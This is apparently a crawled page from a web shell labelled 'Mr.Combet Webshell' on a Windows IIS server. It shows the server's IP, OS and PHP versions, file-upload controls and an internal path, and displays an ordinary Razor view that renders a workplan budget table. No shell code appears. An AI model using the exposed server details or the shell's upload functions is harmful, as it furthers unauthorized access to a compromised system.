Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
mapqa_bak
/
mapqa
/
Views
/
WorkPlan
/
View File Name :
TargetVsActual.cshtml
@model List<RER_Project.DataAccess.Functions.Fn_Workplan_Taget_vs_Actual> @{ ViewBag.Title = "Target Vs Actual Plan"; } <style> table, th, td { border: 1px solid; } </style> <h2>Workplan Target Vs Achievement</h2> <div class="table table-responsive table-striped table-hover table-bordered"> <table class="table table-striped" border="1"> <thead> <tr> <th style="text-align:center" colspan="4">Activities Status</th> <th style="text-align:center" colspan="5"> Finacial Progress </th> </tr> <tr> <th> Assigned To </th> <th> Planned Activities </th> <th> Completed Activities </th> <th> Progress(%) </th> <th> Total Budget </th> <th> Total Allocated to <div id="username"></div> </th> <th> Allocated Budget(%) </th> <th> Budget Expense </th> <th> Financial Progress(%) </th> </tr> </thead> <tbody> @foreach (var values in Model) { <tr style="text-align:center"> <td> @values.priorityactivityonesupportname </td> <td> @values.plannedactivities </td> <td> @values.completedactivities </td> <td> @values.progresspercentage </td> <td> @values.totalbudget </td> <td> @values.allocatedbudget </td> <td> @values.allocatedbudgetprogress </td> <td> @values.budgetexpense </td> <td> @values.financialprogress </td> </tr> } </tbody> </table> </div>